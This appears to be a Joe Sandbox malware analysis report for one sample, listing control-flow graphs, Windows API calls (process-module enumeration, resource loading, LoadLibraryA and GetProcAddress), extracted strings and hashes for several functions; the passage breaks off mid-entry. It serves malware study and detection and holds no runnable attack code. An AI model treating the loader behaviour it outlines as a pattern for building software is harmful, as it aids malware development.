                                                                                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 26 401ed6-401eed call 40ba30 7->26 27 401eef 7->27 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 26->31 27->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 48 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->48 49 401f77-401f8d call 401560 43->49 44->43 45->32 45->39 46->7 50 401d0f 46->50 47->42 48->5 85 4021aa-4021c0 48->85 49->48 55 401d10-401d2e call 401650 50->55 61 401d30-401d34 55->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 65 401d55-401d57 63->65 67 401d3a-401d40 64->67 68 401d4c-401d4e 64->68 65->25 70 401d5d-401d7b call 401650 65->70 67->63 69 401d42-401d4a 67->69 68->65 69->61 69->68 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->77 86->83 87->7 87->55 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 154 40234e call 53d006 122->154 155 40234e call 53d01d 122->155 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 132 402377-402379 131->132 133 40237b 131->133 135 40237d-40238f call 4018d0 132->135 133->135 152 402390 call 53d006 135->152 153 402390 call 53d01d 135->153 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->138 153->138 154->127 155->127
                                                                                                                                      APIs
                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                      • API String ID: 1430744539-2962942730
                                                                                                                                      • Opcode ID: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
                                                                                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                      • Opcode Fuzzy Hash: f33ec6517a8e462eea4e7ce496cce69d106849ef0d44fd50fc6c48668fb332a6
                                                                                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                      Function 02162EF8 Relevance: 8.4, Strings: 6, Instructions: 885COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 845 2162ef8-2162f53 849 2162f75-2162fc4 845->849 850 2162f55-2162f74 845->850 854 2162fc6-2162fcd 849->854 855 2162fdf-2162fe7 849->855 856 2162fd6-2162fdd 854->856 857 2162fcf-2162fd4 854->857 858 2162fea-2162ffe 855->858 856->858 857->858 861 2163014-216301c 858->861 862 2163000-2163007 858->862 865 216301e-2163022 861->865 863 216300d-2163012 862->863 864 2163009-216300b 862->864 863->865 864->865 867 2163024-2163039 865->867 868 2163082-2163085 865->868 867->868 876 216303b-216303e 867->876 869 2163087-216309c 868->869 870 21630cd-21630d3 868->870 869->870 880 216309e-21630a2 869->880 871 2163bce 870->871 872 21630d9-21630db 870->872 877 2163bd3-2164177 871->877 872->871 874 21630e1-21630e6 872->874 878 2163b7c-2163b80 874->878 879 21630ec 874->879 881 2163040-2163042 876->881 882 216305d-216307b call 2160330 876->882 899 2164179-21641b4 877->899 884 2163b87-2163bcd 878->884 885 2163b82-2163b85 878->885 879->878 886 21630a4-21630a8 880->886 887 21630aa-21630c8 call 2160330 880->887 881->882 888 2163044-2163047 881->888 882->868 885->877 885->884 886->870 886->887 887->870 888->868 892 2163049-216305b 888->892 892->868 892->882 899->899 901 21641b6-21641e1 899->901 904 21641f2-21641fa 901->904 905 21641e3-21641e5 901->905 909 21641fc-216420a 904->909 907 21641e7-21641e9 905->907 908 21641eb-21641f0 905->908 907->909 908->909 912 2164220-2164228 909->912 913 216420c-216420e 909->913 916 216422b-216422e 912->916 914 2164217-216421e 913->914 915 2164210-2164215 913->915 914->916 915->916 918 2164245-2164249 916->918 919 2164230-216423e 916->919 920 2164262-2164265 918->920 921 216424b-2164259 918->921 919->918 927 2164240 919->927 922 2164267-216426b 920->922 923 216426d-21642a2 920->923 921->920 928 216425b 921->928 922->923 926 21642a4-21642bb 922->926 932 2164304-2164309 923->932 930 21642c1-21642cd 926->930 931 21642bd-21642bf 926->931 927->918 928->920 933 21642d7-21642e1 930->933 934 21642cf-21642d5 930->934 931->932 935 21642e9 933->935 936 21642e3 933->936 934->935 938 21642f1-21642fd 935->938 936->935 938->932
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Xq$Xq$Xq$Xq$Xq$Xq
                                                                                                                                      • API String ID: 0-905847027
                                                                                                                                      • Opcode ID: 6b470ed9f5e90c40867be897a948344549bb20a047704296698223da041a0062
                                                                                                                                      • Instruction ID: 99122fee19aa9fd77408da89b8dadd279102567d21e53b24b8bb5249309f7918
                                                                                                                                      • Opcode Fuzzy Hash: 6b470ed9f5e90c40867be897a948344549bb20a047704296698223da041a0062
                                                                                                                                      • Instruction Fuzzy Hash: EA52C4296083C5AFCB634FB45CE6BE97FF15F87154B1C02EAE4C04A127CA25D6AAC750
                                                                                                                                      Function 02167630 Relevance: 6.6, Strings: 5, Instructions: 355COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1057 2167630-2167653 1058 2167655-216765b 1057->1058 1059 216765e-216767e 1057->1059 1058->1059 1062 2167685-216768c 1059->1062 1063 2167680 1059->1063 1065 216768e-2167699 1062->1065 1064 2167a14-2167a1d 1063->1064 1066 2167a25-2167a31 1065->1066 1067 216769f-21676b2 1065->1067 1072 2167a33-2167a47 1066->1072 1073 2167a49 1066->1073 1070 21676b4-21676c2 1067->1070 1071 21676c8-21676e3 1067->1071 1070->1071 1082 216799c-21679a3 1070->1082 1078 2167707-216770a 1071->1078 1079 21676e5-21676eb 1071->1079 1072->1073 1074 2167a01 1073->1074 1075 2167a4a-2167a61 1073->1075 1081 2167a08-2167a0b 1074->1081 1085 2167a63-2167a68 1075->1085 1086 2167a6a-2167a6e 1075->1086 1090 2167864-216786a 1078->1090 1091 2167710-2167713 1078->1091 1083 21676f4-21676f7 1079->1083 1084 21676ed 1079->1084 1088 2167a20 1081->1088 1089 2167a0d-2167a12 1081->1089 1082->1064 1087 21679a5-21679a7 1082->1087 1093 216772a-2167730 1083->1093 1095 21676f9-21676fc 1083->1095 1084->1083 1084->1090 1092 2167956-2167959 1084->1092 1084->1093 1094 2167a74-2167a75 1085->1094 1086->1094 1096 21679b6-21679bc 1087->1096 1097 21679a9-21679ae 1087->1097 1088->1066 1089->1064 1089->1087 1090->1092 1098 2167870-2167875 1090->1098 1091->1090 1099 2167719-216771f 1091->1099 1092->1088 1104 216795f-2167965 1092->1104 1105 2167736-2167738 1093->1105 1106 2167732-2167734 1093->1106 1100 2167796-216779c 1095->1100 1101 2167702 1095->1101 1096->1066 1102 21679be-21679c3 1096->1102 1097->1096 1098->1092 1099->1090 1103 2167725 1099->1103 1100->1092 1108 21677a2-21677a8 1100->1108 1101->1092 1102->1081 1107 21679c5-21679ca 1102->1107 1103->1092 1109 2167967-216796f 1104->1109 1110 216798a-216798e 1104->1110 1111 2167742-216774b 1105->1111 1106->1111 1107->1088 1113 21679cc 1107->1113 1114 21677ae-21677b0 1108->1114 1115 21677aa-21677ac 1108->1115 1109->1066 1116 2167975-2167984 1109->1116 1110->1082 1112 2167990-2167996 1110->1112 1117 216775e-2167786 1111->1117 1118 216774d-2167758 1111->1118 1112->1065 1112->1082 1119 21679d3-21679d8 1113->1119 1120 21677ba-21677d1 1114->1120 1115->1120 1116->1071 1116->1110 1138 216778c-2167791 1117->1138 1139 216787a-21678b0 1117->1139 1118->1092 1118->1117 1123 21679fa-21679fc 1119->1123 1124 21679da-21679dc 1119->1124 1130 21677d3-21677ec 1120->1130 1131 21677fc-2167823 1120->1131 1123->1088 1127 21679fe-21679ff 1123->1127 1128 21679de-21679e3 1124->1128 1129 21679eb-21679f1 1124->1129 1127->1074 1128->1129 1129->1066 1133 21679f3-21679f8 1129->1133 1130->1139 1142 21677f2-21677f7 1130->1142 1131->1088 1144 2167829-216782c 1131->1144 1133->1123 1134 21679ce-21679d1 1133->1134 1134->1088 1134->1119 1138->1139 1145 21678b2-21678b6 1139->1145 1146 21678bd-21678c5 1139->1146 1142->1139 1144->1088 1147 2167832-216785b 1144->1147 1148 21678d5-21678d9 1145->1148 1149 21678b8-21678bb 1145->1149 1146->1088 1150 21678cb-21678d0 1146->1150 1147->1139 1162 216785d-2167862 1147->1162 1151 21678db-21678e1 1148->1151 1152 21678f8-21678fc 1148->1152 1149->1146 1149->1148 1150->1092 1151->1152 1154 21678e3-21678eb 1151->1154 1155 2167906-2167925 call 2167c08 1152->1155 1156 21678fe-2167904 1152->1156 1154->1088 1157 21678f1-21678f6 1154->1157 1159 216792b-216792f 1155->1159 1156->1155 1156->1159 1157->1092 1159->1092 1160 2167931-216794d 1159->1160 1160->1092 1162->1139
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$,q$,q
                                                                                                                                      • API String ID: 0-189141485
                                                                                                                                      • Opcode ID: a0971440e1725a3f7c1c517e1fd5ca57d5689e70264f20184d39347196e64da7
                                                                                                                                      • Instruction ID: ccf11558b420f2a6a2e97f36ed0258ad315e21cdaa287bf04a08f455b11c1197
                                                                                                                                      • Opcode Fuzzy Hash: a0971440e1725a3f7c1c517e1fd5ca57d5689e70264f20184d39347196e64da7
                                                                                                                                      • Instruction Fuzzy Hash: 4DE12A70A401199FDB14CF69C898ABDFBF2FF88318F198065E415AB2A5D731ED62CB50
                                                                                                                                      Function 061C5048 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N
                                                                                                                                      • API String ID: 0-1130791706
                                                                                                                                      • Opcode ID: f2700d4421d4b008d5e06cb8cf0e6b0401ee06116e81a1c4b63ad139a5e8522b
                                                                                                                                      • Instruction ID: 85db4b3192411508e25294c1203046b219ee71f3d82a5573abfdad0586bd7591
                                                                                                                                      • Opcode Fuzzy Hash: f2700d4421d4b008d5e06cb8cf0e6b0401ee06116e81a1c4b63ad139a5e8522b
                                                                                                                                      • Instruction Fuzzy Hash: C873F531C1075A8EDB11EF68C854A9DFBB1FF99310F15C69AE44867261EB70AAC4CF81
                                                                                                                                      Function 02166EA8 Relevance: 4.3, Strings: 3, Instructions: 540COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1925 2166ea8-2166ea9 1926 2166e61-2166e66 1925->1926 1927 2166eab-2166eb1 1925->1927 1932 2166e70-2166e7e 1926->1932 1930 2166eb3-2166eee 1927->1930 1931 2166e69 1927->1931 1933 2166ef4-2166f02 1930->1933 1934 21674c5-21674d1 1930->1934 1931->1932 1943 2166e84-2166e92 1932->1943 1944 2166e80-2166e82 1932->1944 1941 2166f04-2166f15 1933->1941 1942 2166f30-2166f41 1933->1942 1939 21674d3-2167524 call 2167630 1934->1939 1940 2167489-21674c0 1934->1940 1959 2167526-216752a 1939->1959 1960 2167574-2167578 1939->1960 2008 2167441-216747f 1940->2008 1941->1942 1953 2166f17-2166f23 1941->1953 1945 2166fb2-2166fc6 1942->1945 1946 2166f43-2166f47 1942->1946 1962 2166e94-2166e97 1943->1962 1963 2166e99 1943->1963 1947 2166e9e-2166ea1 1944->1947 2084 2166fc9 call 21674e0 1945->2084 2085 2166fc9 call 2166ea8 1945->2085 1948 2166f62-2166f6b 1946->1948 1949 2166f49-2166f55 1946->1949 1957 2167280 1948->1957 1958 2166f71-2166f74 1948->1958 1955 21672ef-216733a 1949->1955 1956 2166f5b-2166f5d 1949->1956 1964 2167285-21672e8 1953->1964 1965 2166f29-2166f2b 1953->1965 1954 2166fcf-2166fd5 1966 2166fd7-2166fd9 1954->1966 1967 2166fde-2166fe5 1954->1967 2049 2167341-21673c0 1955->2049 1968 2167276-216727d 1956->1968 1957->1964 1958->1957 1969 2166f7a-2166f99 1958->1969 1970 216752c-2167531 1959->1970 1971 2167539-2167540 1959->1971 1972 216758f-21675a3 1960->1972 1973 216757a-2167589 1960->1973 1962->1947 1963->1947 1964->1955 1965->1968 1966->1968 1976 2166feb-2167002 1967->1976 1977 21670d9-21670ea 1967->1977 1969->1957 2006 2166f9f-2166fa5 1969->2006 1970->1971 1981 2167616-2167629 1971->1981 1982 2167546-216754d 1971->1982 1980 21675ab-21675b2 1972->1980 2086 21675a5 call 216a2e0 1972->2086 2087 21675a5 call 216a598 1972->2087 2088 21675a5 call 216a5f8 1972->2088 1978 21675b5-21675bf 1973->1978 1979 216758b-216758d 1973->1979 1976->1977 2004 2167008-2167014 1976->2004 1999 2167114-216711a 1977->1999 2000 21670ec-21670f9 1977->2000 1987 21675c1-21675c7 1978->1987 1988 21675c9-21675cd 1978->1988 1979->1980 2001 21675e1-216760f 1981->2001 2002 216762b-216762d 1981->2002 1982->1960 1986 216754f-2167553 1982->1986 1995 2167555-216755a 1986->1995 1996 2167562-2167569 1986->1996 1989 21675d5-21675da 1987->1989 1988->1989 1990 21675cf 1988->1990 1989->2001 1990->1989 1995->1996 1996->1981 1997 216756f-2167572 1996->1997 1997->1980 2009 2167135-216713b 1999->2009 2010 216711c-2167128 1999->2010 2000->2009 2023 21670fb-2167107 2000->2023 2001->1981 2011 21670d2-21670d4 2004->2011 2012 216701a-216708c 2004->2012 2006->1934 2014 2166fab-2166faf 2006->2014 2008->1940 2018 2167273 2009->2018 2019 2167141-216715e 2009->2019 2016 21673d7-216743a 2010->2016 2017 216712e-2167130 2010->2017 2011->1968 2050 216708e-21670b8 2012->2050 2051 21670ba-21670cf 2012->2051 2014->1945 2016->2008 2017->1968 2018->1968 2019->1957 2041 2167164-2167167 2019->2041 2027 21673c5-21673d0 2023->2027 2028 216710d-216710f 2023->2028 2027->2016 2028->1968 2041->1934 2046 216716d-2167193 2041->2046 2046->2018 2057 2167199-21671a5 2046->2057 2050->2051 2051->2011 2058 216726f-2167271 2057->2058 2059 21671ab-2167229 2057->2059 2058->1968 2076 2167257-216726c 2059->2076 2077 216722b-2167255 2059->2077 2076->2058 2077->2076 2084->1954 2085->1954 2086->1980 2087->1980 2088->1980
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$Hq$\;q
                                                                                                                                      • API String ID: 0-3898731621
                                                                                                                                      • Opcode ID: 3262d896c439bc0da97d50b01482c9c32dbac4c84af22b646717b062019ef98b
                                                                                                                                      • Instruction ID: a7d180bae965ab3bd1b3bdf775714bb9113eb6d843c1abfac1e131f4ddcf4705
                                                                                                                                      • Opcode Fuzzy Hash: 3262d896c439bc0da97d50b01482c9c32dbac4c84af22b646717b062019ef98b
                                                                                                                                      • Instruction Fuzzy Hash: 7D128070A002198FDB18DF69C858BAEBBF6FF88304F148569E405DB395EB349D56CB90
                                                                                                                                      Function 065D4800 Relevance: 3.7, Strings: 2, Instructions: 1152COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Teq$p@q
                                                                                                                                      • API String ID: 0-2716814348
                                                                                                                                      • Opcode ID: e2a5f608a6e4197c848ff129d3f0e86611f424dd0f0a69e2672a7b5504f3833e
                                                                                                                                      • Instruction ID: 5394938365c9ba3c29695514ba1c1515470a48b2186895844079fd71b9a112c8
                                                                                                                                      • Opcode Fuzzy Hash: e2a5f608a6e4197c848ff129d3f0e86611f424dd0f0a69e2672a7b5504f3833e
                                                                                                                                      • Instruction Fuzzy Hash: 74C2E774A01219CFDB64DF24C998BADBBB2FB89301F1085E9D80967364DB35AE85DF40
                                                                                                                                      Function 061C9C48 Relevance: 3.5, Strings: 1, Instructions: 2266COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: K
                                                                                                                                      • API String ID: 0-856455061
                                                                                                                                      • Opcode ID: e46d1c4187e4d26cb7ae83e3fe82fe18a844a12bd72dbeb160896c625da32065
                                                                                                                                      • Instruction ID: 4570f85fff8942b37e5df86358702191d082a35bf1d3fbf7a12886447be70802
                                                                                                                                      • Opcode Fuzzy Hash: e46d1c4187e4d26cb7ae83e3fe82fe18a844a12bd72dbeb160896c625da32065
                                                                                                                                      • Instruction Fuzzy Hash: 8333F430C147198EDB51EF68C894A9DF7B1FF99310F15C69AD448AB261EB70AAC4CF81
                                                                                                                                      Function 0216A598 Relevance: 3.4, Strings: 2, Instructions: 894COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$4'q
                                                                                                                                      • API String ID: 0-1336004174
                                                                                                                                      • Opcode ID: 8f941da77e9d7f5ff8266f6859bac5d9609c0a2b7b970ef915386f8f61122ea3
                                                                                                                                      • Instruction ID: 0bc049afffb6f2d6f7845d62b7129b679c705a849ecb5b803231421cc788c656
                                                                                                                                      • Opcode Fuzzy Hash: 8f941da77e9d7f5ff8266f6859bac5d9609c0a2b7b970ef915386f8f61122ea3
                                                                                                                                      • Instruction Fuzzy Hash: 28827D71A40209DFCB15CF68C588ABEBBF2BF88304F158599E815EB361D731E961CB91
                                                                                                                                      Function 02164311 Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Xq$$q
                                                                                                                                      • API String ID: 0-855381642
                                                                                                                                      • Opcode ID: 7ca15a105d06945951abd02530d7a3387cf3ccc321252c644510db8b246ef9a2
                                                                                                                                      • Instruction ID: 42950d7c972eeac2b2ec8b17b440cf662e9e62cd3be706297d8d3784c44f4f58
                                                                                                                                      • Opcode Fuzzy Hash: 7ca15a105d06945951abd02530d7a3387cf3ccc321252c644510db8b246ef9a2
                                                                                                                                      • Instruction Fuzzy Hash: 4AF17C74E04348DFDB18DFB9D898AAEBBB3BF89300B158529E446A7354CF349812CB50
                                                                                                                                      Function 0216C4E0 Relevance: 2.9, Strings: 2, Instructions: 353COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 95977c83cf9166e02a5d71d2d642b28155b38e7fa451cf2fd325b6b67e1ae0f2
                                                                                                                                      • Instruction ID: c82bcad92b223ec86deafbaf82eb298ea5b37adddac015aad85cd90fde9257da
                                                                                                                                      • Opcode Fuzzy Hash: 95977c83cf9166e02a5d71d2d642b28155b38e7fa451cf2fd325b6b67e1ae0f2
                                                                                                                                      • Instruction Fuzzy Hash: F7E10C75E40218CFDB14DF69C888AADBBB2BF48310F15906AE859AB361D730EC51CF94
                                                                                                                                      Function 0216D20A Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 0864a5dc1baf63d92cf0d7abf0fc10c91b63530c7e95ac8775defde8fe9041e6
                                                                                                                                      • Instruction ID: 4e00a5fa35ed20926cd09b5948d49f4fc103695ed703bf3cedd1981dd04f6db5
                                                                                                                                      • Opcode Fuzzy Hash: 0864a5dc1baf63d92cf0d7abf0fc10c91b63530c7e95ac8775defde8fe9041e6
                                                                                                                                      • Instruction Fuzzy Hash: 2E91FA74E40218CFDB18DFA9D988BADBBF2BF89310F148069D859AB365DB305956CF10
                                                                                                                                      Function 0216D7B8 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 1b8089cb25a315e80f5c4b51aabe865d1a090efaa803f29808208ed386d0ef8d
